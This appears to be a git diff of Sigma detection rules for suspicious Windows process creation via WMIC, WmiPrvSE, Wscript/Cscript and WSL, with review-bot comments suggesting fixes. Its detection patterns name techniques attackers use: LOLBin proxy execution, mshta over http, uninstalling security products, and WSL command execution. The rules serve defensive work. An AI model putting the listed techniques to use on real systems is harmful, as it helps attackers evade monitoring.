- type: obsoletes
- - id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5
- type: obsoletes
- - id: 04f5363a-6bca-42ff-be70-0d28bf629ead
- type: obsoletes
+ - id: 438025f9-5856-4663-83f7-52f878a70a50
+ type: derived
+ - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a
+ type: obsoletes
+ - id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0
+ type: obsoletes
+ - id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5
+ type: obsoletes
+ - id: 04f5363a-6bca-42ff-be70-0d28bf629ead
+ type: obsoletes
 status: test
-description: Office application called wmic to proxye execution through a LOLBIN process.
- This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
+description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
 references:
 - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
 - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
@@ -47,14 +46,15 @@ detection:
 - \wordpad.exe
 - \wordview.exe
 selection_wmic_img:
- - Image|endswith: \wbem\WMIC.exe
- - OriginalFileName: wmic.exe
+ - Image|endswith: \wbem\WMIC.exe
+ - OriginalFileName: wmic.exe
 selection_wmic_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - process
 - create
 - call
- CommandLine|contains:
+ CommandLine|contains:
+ # Add more suspicious LOLBINs as you see fit
 - regsvr32
 - rundll32
 - msiexec
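Review bot: The rejoined `+description:` line carries the typo "proxye" into the new text, and since that line is being rewritten anyway this is the moment to fix it: `description: Office application called wmic to proxy execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).`. The same sentence spells the term both "LOLBIN" and "LOLBin"; picking one form avoids the inconsistency surfacing in every rendered rule list. The added comment in the second hunk, `# Add more suspicious LOLBINs as you see fit`, is fine, but the `CommandLine|contains` list it annotates continues past the end of the hunk, so a reader editing it should check the remaining entries outside this view.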
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_process_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_process_creation.yml
index fd1ec37a1..62453b73a 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_process_creation.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_process_creation.yml
@@ -1,11 +1,10 @@
 title: Suspicious Process Created Via Wmic.EXE
 id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8
 related:
- - id: 526be59f-a573-4eea-b5f7-f0973207634d
- type: derived
+ - id: 526be59f-a573-4eea-b5f7-f0973207634d # Generic
+ type: derived
 status: test
-description: Detects WMIC executing "process call create" with suspicious calls to
- processes such as "rundll32", "regsrv32", etc.
+description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.
 references:
 - https://thedfirreport.com/2020/10/08/ryuks-return/
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
@@ -24,11 +23,12 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - 'process '
 - 'call '
 - 'create '
- CommandLine|contains:
+ CommandLine|contains:
+ # Add more susupicious paths and binaries as you see fit in your env
 - rundll32
 - bitsadmin
 - regsvr32
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_terminate_application.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_terminate_application.yml
index 776d08f2e..c4013c26c 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_terminate_application.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_terminate_application.yml
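Review bot: The new `+description:` line names "regsrv32", but the binary the second hunk's `CommandLine|contains` list actually matches is `regsvr32`; the description should read `... processes such as "rundll32", "regsvr32", etc.` so that someone searching the rule set for the real binary name finds this rule. In the same second hunk the added comment misspells "suspicious": `# Add more suspicious paths and binaries as you see fit in your env`. The `CommandLine|contains` list and the rule's `condition` continue past the end of the hunk, so the full set of matched binaries is not visible here.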
@@ -1,11 +1,10 @@
 title: Application Terminated Via Wmic.EXE
 id: 49d9671b-0a0a-4c09-8280-d215bfd30662
 related:
- - id: 847d5ff3-8a31-4737-a970-aeae8fe21765
- type: derived
+ - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 # Uninstall Security Products
+ type: derived
 status: experimental
-description: Detects calls to the "terminate" function via wmic in order to kill an
- application
+description: Detects calls to the "terminate" function via wmic in order to kill an application
 references:
 - https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/
 - https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf
@@ -23,10 +22,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \WMIC.exe
- - OriginalFileName: wmic.exe
+ - Image|endswith: \WMIC.exe
+ - OriginalFileName: wmic.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - call
 - terminate
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_application.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_application.yml
index a8ab3d301..2f1fb5e6b 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_application.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_application.yml
@@ -1,8 +1,8 @@
 title: Application Removed Via Wmic.EXE
 id: b53317a0-8acf-4fd1-8de8-a5401e776b96
 related:
- - id: 847d5ff3-8a31-4737-a970-aeae8fe21765
- type: derived
+ - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 # Uninstall Security Products
+ type: derived
 status: test
 description: Uninstall an application with wmic
 references:
@@ -22,10 +22,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \WMIC.exe
- - OriginalFileName: wmic.exe
+ - Image|endswith: \WMIC.exe
+ - OriginalFileName: wmic.exe
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - call
 - uninstall
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_security_products.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_security_products.yml
index 90603ad6b..fb884c273 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_security_products.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_security_products.yml
@@ -1,11 +1,10 @@
 title: Potential Tampering With Security Products Via WMIC
 id: 847d5ff3-8a31-4737-a970-aeae8fe21765
 related:
- - id: b53317a0-8acf-4fd1-8de8-a5401e776b96
- type: derived
+ - id: b53317a0-8acf-4fd1-8de8-a5401e776b96 # Generic Uninstall
+ type: derived
 status: test
-description: Detects uninstallation or termination of security products using the
- WMIC utility
+description: Detects uninstallation or termination of security products using the WMIC utility
 references:
 - https://twitter.com/cglyer/status/1355171195654709249
 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
@@ -27,26 +26,26 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_cli_1:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - wmic
 - 'product where '
 - call
 - uninstall
 - /nointeractive
 selection_cli_2:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - wmic
 - 'caption like '
- CommandLine|contains:
+ CommandLine|contains:
 - call delete
 - call terminate
 selection_cli_3:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - 'process '
 - 'where '
 - delete
 selection_product:
- CommandLine|contains:
+ CommandLine|contains:
 - '%carbon%'
 - '%cylance%'
 - '%endpoint%'
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_xsl_script_processing.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
index e9af4a795..ab27f4e6d 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
@@ -1,16 +1,10 @@
 title: XSL Script Execution Via WMIC.EXE
 id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d
 status: test
-description: 'Detects the execution of WMIC with the "format" flag to potentially
- load XSL files.
-
- Adversaries abuse this functionality to execute arbitrary files while potentially
- bypassing application whitelisting defenses.
-
- Extensible Stylesheet Language (XSL) files are commonly used to describe the processing
- and rendering of data within XML files.
-
- '
+description: |
+ Detects the execution of WMIC with the "format" flag to potentially load XSL files.
+ Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
+ Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md
 author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel
@@ -29,11 +23,11 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 Image|endswith: \wmic.exe
- CommandLine|contains:
- - /format
- - -format
+ CommandLine|contains:
+ - /format # wmic process list /FORMAT /?
+ - -format # wmic process list -FORMAT /?
 filter_main_known_format:
- CommandLine|contains:
+ CommandLine|contains:
 - Format:List
 - Format:htable
 - Format:hform
@@ -45,8 +39,7 @@ detection:
 - Format:csv
 condition: process_creation and (selection and not 1 of filter_main_*)
 falsepositives:
- - WMIC.exe FP depend on scripts and administrative methods used in the monitored
- environment.
+ - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.
 - Static format arguments
 - https://petri.com/command-line-wmi-part-3
 level: medium
 ruletype: Sigma
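Review bot: In the second hunk, `selection` identifies the binary only by `Image|endswith: \wmic.exe`, while every sibling wmic rule in this commit pairs that with an `OriginalFileName: wmic.exe` alternative (for example the first hunk of proc_creation_win_wmic_process_creation.yml); this is the one rule in the set that loses coverage when the executable is copied under another name, and its own description says the technique is about bypassing application whitelisting. The commit only re-indents these lines, so it would be a good moment to bring the rule in line with its siblings by splitting the image match and the command-line match into two selections and adjusting the `condition` in the third hunk. The `detection:` block begins before the hunk, so the `process_creation` selection referenced by the condition is not visible here and is left as is.
```yaml
selection_img:
    - Image|endswith: \wmic.exe
    - OriginalFileName: wmic.exe
selection_cli:
    CommandLine|contains:
        - /format # wmic process list /FORMAT /?
        - -format # wmic process list -FORMAT /?
# … unchanged: filter_main_known_format …
condition: process_creation and (all of selection_* and not 1 of filter_main_*)
```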
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawning_process.yml b/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawning_process.yml
index 7be9ac072..57071d9be 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawning_process.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawning_process.yml
@@ -1,10 +1,10 @@
 title: WmiPrvSE Spawned A Process
 id: d21374ff-f574-44a7-9998-4a8c8bf33d7d
 related:
- - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937
- type: similar
- - id: 692f0bec-83ba-4d04-af7e-e884a96059b6
- type: similar
+ - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937
+ type: similar
+ - id: 692f0bec-83ba-4d04-af7e-e884a96059b6
+ type: similar
 status: stable
 description: Detects WmiPrvSE spawning a process
 references:
@@ -27,18 +27,18 @@ detection:
 ParentImage|endswith: \WmiPrvSe.exe
 filter_logonid:
 LogonId:
- - '0x3e7'
- - 'null'
+ - '0x3e7' # LUID 999 for SYSTEM
+ - 'null' # too many false positives
 filter_system_user:
- User|contains:
+ User|contains: # covers many language settings
 - AUTHORI
 - AUTORI
 filter_wmiprvse:
 Image|endswith: \WmiPrvSE.exe
 filter_werfault:
 Image|endswith: \WerFault.exe
- filter_null:
- LogonId: null
+ filter_null: # some backends need the null value in a separate expression
+ LogonId:
 condition: process_creation and (selection and not 1 of filter_*)
 falsepositives:
 - False positives are expected (e.g. in environments where WinRM is used legitimately)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml b/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml
index 9ddedff32..df9315d84 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml
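Review bot: The second hunk replaces `LogonId: null` in `filter_null` with a bare `LogonId:`; an empty YAML scalar parses to the same null value, so the filter should behave as before, but the empty form reads like a value that was dropped by accident, and the new comment speaks of "the null value" without there being one on the line. Either keep the value explicit, `LogonId: null # some backends need the null value in a separate expression`, or, if the empty form is required by a specific backend, say which one in the comment so the next editor does not "fix" it. The quoted `'null'` entry two lines up in `filter_logonid` is a different thing, a literal string as emitted by some pipelines, and its comment `# too many false positives` would be clearer as `# literal string "null" as logged by some pipelines; the real null value is handled by filter_null`.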
@@ -1,13 +1,12 @@
 title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
 id: 692f0bec-83ba-4d04-af7e-e884a96059b6
 related:
- - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937
- type: similar
- - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d
- type: similar
+ - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937
+ type: similar
+ - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d
+ type: similar
 status: stable
-description: Detects Powershell as a child of the WmiPrvSE process. Which could be
- a sign of lateral movement via WMI.
+description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
 references:
 - https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e
 author: Markus Neis @Karneades
@@ -28,12 +27,12 @@ detection:
 selection_parent:
 ParentImage|endswith: \WmiPrvSE.exe
 selection_img:
- - Image|endswith:
- - \powershell.exe
- - \pwsh.exe
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
+ - Image|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
 condition: process_creation and (all of selection_*)
 falsepositives:
 - AppvClient
diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml
index 25ededcef..37bf2dc7c 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml
@@ -1,12 +1,12 @@ title: Suspicious WmiPrvSE Child Process id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 related: - - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 - type: similar - - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d - type: similar - - id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 - type: obsoletes + - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 + type: similar + - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d + type: similar + - id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 + type: obsoletes status: test description: Detects suspicious and uncommon child processes of WmiPrvSE references: @@ -34,6 +34,7 @@ detection: selection_parent: ParentImage|endswith: \wbem\WmiPrvSE.exe selection_children_1: + # TODO: Add more LOLBINs or suspicious processes that make sens in your environment Image|endswith: - \certutil.exe - \cscript.exe @@ -44,8 +45,9 @@ detection: - \verclsid.exe - \wscript.exe selection_children_2: + # This is in a separate selection due to the nature of FP generated with CMD Image|endswith: \cmd.exe - CommandLine|contains: + CommandLine|contains: - cscript - mshta - powershell @@ -56,12 +58,11 @@ detection: filter_main_werfault: Image|endswith: \WerFault.exe filter_main_wmiprvse: - Image|endswith: \WmiPrvSE.exe + Image|endswith: \WmiPrvSE.exe # In some legitimate case WmiPrvSE was seen spawning itself filter_main_msiexec: Image|endswith: \msiexec.exe - CommandLine|contains: '/i ' - condition: process_creation and (selection_parent and 1 of selection_children_* - and not 1 of filter_main_*) + CommandLine|contains: '/i ' + condition: process_creation and (selection_parent and 1 of selection_children_* and not 1 of filter_main_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_wpbbin_potential_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_wpbbin_potential_persistence.yml index 46a81f905..d3b953996 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wpbbin_potential_persistence.yml 
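Review bot: The `filter_main_wmiprvse` exclusion annotated in this hunk matches any child named `WmiPrvSE.exe` regardless of directory, while `selection_parent` is anchored on `\wbem\WmiPrvSE.exe`; a binary dropped elsewhere under that name and spawned by the real provider host would be silently excluded. I would anchor the filter the same way, `Image|endswith: \wbem\WmiPrvSE.exe`, and have the comment say why: `# WmiPrvSE.exe was seen spawning itself in legitimate cases; anchored on \wbem\ so a renamed copy elsewhere is not filtered`. Minor: `sens` in the new TODO comment should read `sense`.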
+++ b/sigma/sysmon/process_creation/proc_creation_win_wpbbin_potential_persistence.yml @@ -1,8 +1,7 @@ title: UEFI Persistence Via Wpbbin - ProcessCreation id: 4abc0ec4-db5a-412f-9632-26659cddf145 status: test -description: Detects execution of the binary "wpbbin" which is used as part of the - UEFI based persistence method described in the reference section +description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section references: - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c - https://persistence-info.github.io/Data/wpbbin.html @@ -24,7 +23,6 @@ detection: Image: C:\Windows\System32\wpbbin.exe condition: process_creation and selection falsepositives: - - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks - @0gtweet for the tip) + - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip) level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_script_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_script_exec.yml index f2fb5e0ac..8d0a5be33 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_script_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_script_exec.yml @@ -1,11 +1,10 @@ title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript id: 1e33157c-53b1-41ad-bbcc-780b80b58288 related: - - id: 23250293-eed5-4c39-b57a-841c8933a57d - type: obsoletes + - id: 23250293-eed5-4c39-b57a-841c8933a57d + type: obsoletes status: test -description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by - Wscript/Cscript +description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript author: Michael Haag date: 2019/01/16 modified: 2023/05/15 
@@ -22,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - wscript.exe - - cscript.exe - - Image|endswith: - - \wscript.exe - - \cscript.exe + - OriginalFileName: + - wscript.exe + - cscript.exe + - Image|endswith: + - \wscript.exe + - \cscript.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - .js - .jse - .vba @@ -38,7 +37,6 @@ detection: - .wsf condition: process_creation and (all of selection_*) falsepositives: - - Some additional tuning is required. It is recommended to add the user profile - path in CommandLine if it is getting too noisy. + - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml index 95e631400..0bb9ec2f7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml 
@@ -1,14 +1,9 @@ title: Cscript/Wscript Potentially Suspicious Child Process id: b6676963-0353-4f88-90f5-36c20d443c6a status: experimental -description: 'Detects potentially suspicious child processes of Wscript/Cscript. These - include processes such as rundll32 with uncommon exports or PowerShell spawning - rundll32 or regsvr32. - - Malware such as Pikabot and Qakbot were seen using similar techniques as well - as many others. - - ' +description: | + Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. + Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others. references: - Internal Research - https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt @@ -35,12 +30,13 @@ detection: - \cmd.exe - \powershell.exe - \pwsh.exe + # Note: Add other combinations that are suspicious selection_cli_script_option_mshta: - CommandLine|contains|all: + CommandLine|contains|all: - mshta - http selection_cli_script_option_other: - CommandLine|contains: + CommandLine|contains: - rundll32 - regsvr32 - msiexec 
@@ -48,15 +44,12 @@ detection: Image|endswith: \rundll32.exe filter_main_rundll32_known_exports: Image|endswith: \rundll32.exe - CommandLine|contains: + CommandLine|contains: - UpdatePerUserSystemParameters - PrintUIEntry - ClearMyTracksByProcess - condition: process_creation and (selection_parent and ( selection_cli_standalone - or (selection_cli_script_main and 1 of selection_cli_script_option_*) ) and - not 1 of filter_main_*) + condition: process_creation and (selection_parent and ( selection_cli_standalone or (selection_cli_script_main and 1 of selection_cli_script_option_*) ) and not 1 of filter_main_*) falsepositives: - - Some false positives might occur with admin or third party software scripts. - Investigate and apply additional filters accordingly. + - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml index 157fede93..57d261b6e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml @@ -1,8 +1,7 @@ title: Cscript/Wscript Uncommon Script Extension Execution id: 99b7460d-c9f1-40d7-a316-1f36f61d52ee status: experimental -description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) - extension +description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension author: Nasreddine Bencherchali (Nextron Systems) date: 2023/05/15 modified: 2023/06/19 
@@ -19,14 +18,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - wscript.exe - - cscript.exe - - Image|endswith: - - \wscript.exe - - \cscript.exe + - OriginalFileName: + - wscript.exe + - cscript.exe + - Image|endswith: + - \wscript.exe + - \cscript.exe selection_extension: - CommandLine|contains: + CommandLine|contains: + # Note: add additional potential suspicious extension + # We could specify the "//E:" flag to avoid typos by admin. But since that's prone to blind spots via the creation of assoc it's better not to include it - .csv - .dat - .doc diff --git a/sigma/sysmon/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml b/sigma/sysmon/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml index 884305968..be504d460 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml @@ -1,12 +1,10 @@ title: WSL Child Process Anomaly id: 2267fe65-0681-42ad-9a6d-46553d3f3480 related: - - id: dec44ca7-61ad-493c-bfd7-8819c5faa09b - type: derived + - id: dec44ca7-61ad-493c-bfd7-8819c5faa09b # LOLBIN Rule + type: derived status: experimental -description: Detects uncommon or suspicious child processes spawning from a WSL process. - This could indicate an attempt to evade parent/child relationship detections or - persistence attempts via cron using WSL +description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/ - https://twitter.com/nas_bench/status/1535431474429808642 
@@ -32,6 +30,7 @@ detection: - \wslhost.exe selection_children_images: Image|endswith: + # Add more suspicious/uncommon "lolbin" processes - \calc.exe - \cmd.exe - \cscript.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_wsl_lolbin_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_wsl_lolbin_execution.yml index 68fb0d908..553282efe 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wsl_lolbin_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wsl_lolbin_execution.yml @@ -1,11 +1,10 @@ title: Arbitrary Command Execution Using WSL id: dec44ca7-61ad-493c-bfd7-8819c5faa09b related: - - id: 2267fe65-0681-42ad-9a6d-46553d3f3480 - type: similar + - id: 2267fe65-0681-42ad-9a6d-46553d3f3480 # Generic susp child processes rules + type: similar status: test -description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as - a LOLBIN to execute arbitrary Linux or Windows commands +description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/ - https://twitter.com/nas_bench/status/1535431474429808642 
@@ -26,28 +25,31 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wsl.exe - - OriginalFileName: wsl.exe + - Image|endswith: \wsl.exe + - OriginalFileName: wsl.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' --exec' - ' --system' - ' --shell-type ' - - ' /mnt/c' + - ' /mnt/c' # Path to mounted "C:\" partition (Indication of running Windows binaries via WSL) - ' --user root' - ' -u root' - --debug-shell filter_main_kill: + # This filter is to handle a FP that occurs when a process is spawned from WSL and then closed by the user + # Example would be to open VsCode through it's server extension from WSL + # GrandparentCommandLine: "C:\Users\XXX\AppData\Local\Programs\Microsoft VS Code\Code.exe" --ms-enable-electron-run-as-node c:\Users\XXX\.vscode\extensions\ms-vscode-remote.remote-wsl-0.72.0\dist\wslDaemon.js + # ParentCommandLine: C:\WINDOWS\system32\cmd.exe /d /s /c "C:\WINDOWS\System32\wsl.exe -d Ubuntu-20.04 -e kill 1366" + # CommandLine: C:\WINDOWS\System32\wsl.exe -d Ubuntu-20.04 -e kill 1366 ParentImage|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' -d ' - ' -e kill ' condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Automation and orchestration scripts may use this method to execute scripts - etc. - - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL - server) + - Automation and orchestration scripts may use this method to execute scripts etc. + - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server) level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml index a6aee5ecd..4577580f7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml 
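Review bot: The `filter_main_kill` exclusion keys on two substrings anywhere in the command line, so an invocation such as `wsl.exe -d Ubuntu -e sh -c "... -e kill "` launched from cmd.exe would also be dropped even though it runs an arbitrary shell; the new comments describe a very specific VS Code shape (`-e kill <pid>` at the end of the line) but the filter is much looser than that. If the false positive really is the VS Code daemon, I would tighten the match to the end of the line, e.g. `CommandLine|re: ' -d \S+ -e kill \d+$'`, or at least add `# Note: substring match - any wsl.exe cmdline from cmd.exe containing ' -e kill ' is excluded` so analysts know the gap.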
+++ b/sigma/sysmon/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml @@ -1,8 +1,7 @@ title: Windows Binary Executed From WSL id: ed825c86-c009-4014-b413-b76003e33d35 status: test -description: Detects the execution of Windows binaries from within a WSL instance. - This could be used to masquerade parent-child relationships +description: Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -21,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|re: '[a-zA-Z]:\\' - CurrentDirectory|contains: \\\\wsl.localhost + CurrentDirectory|contains: \\\\wsl.localhost # Note: programs not supporting UNC paths (example: cmd.exe). Will default to another location condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wuauclt_dll_loading.yml b/sigma/sysmon/process_creation/proc_creation_win_wuauclt_dll_loading.yml index f9a4ac24a..6c217d932 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wuauclt_dll_loading.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wuauclt_dll_loading.yml 
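Review bot: The comment added to `CurrentDirectory|contains: \\\\wsl.localhost` is helpful, but the match is tied to a single UNC prefix; as far as I know older Windows builds expose WSL distributions under `\\wsl$\` instead, so processes started from there would not hit this rule. If that prefix applies in your environment, consider listing both values under `CurrentDirectory|contains`, and reword the note to be explicit about the limitation it describes: `# Note: binaries that do not support a UNC working directory (e.g. cmd.exe) fall back to another CurrentDirectory and will not match`.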
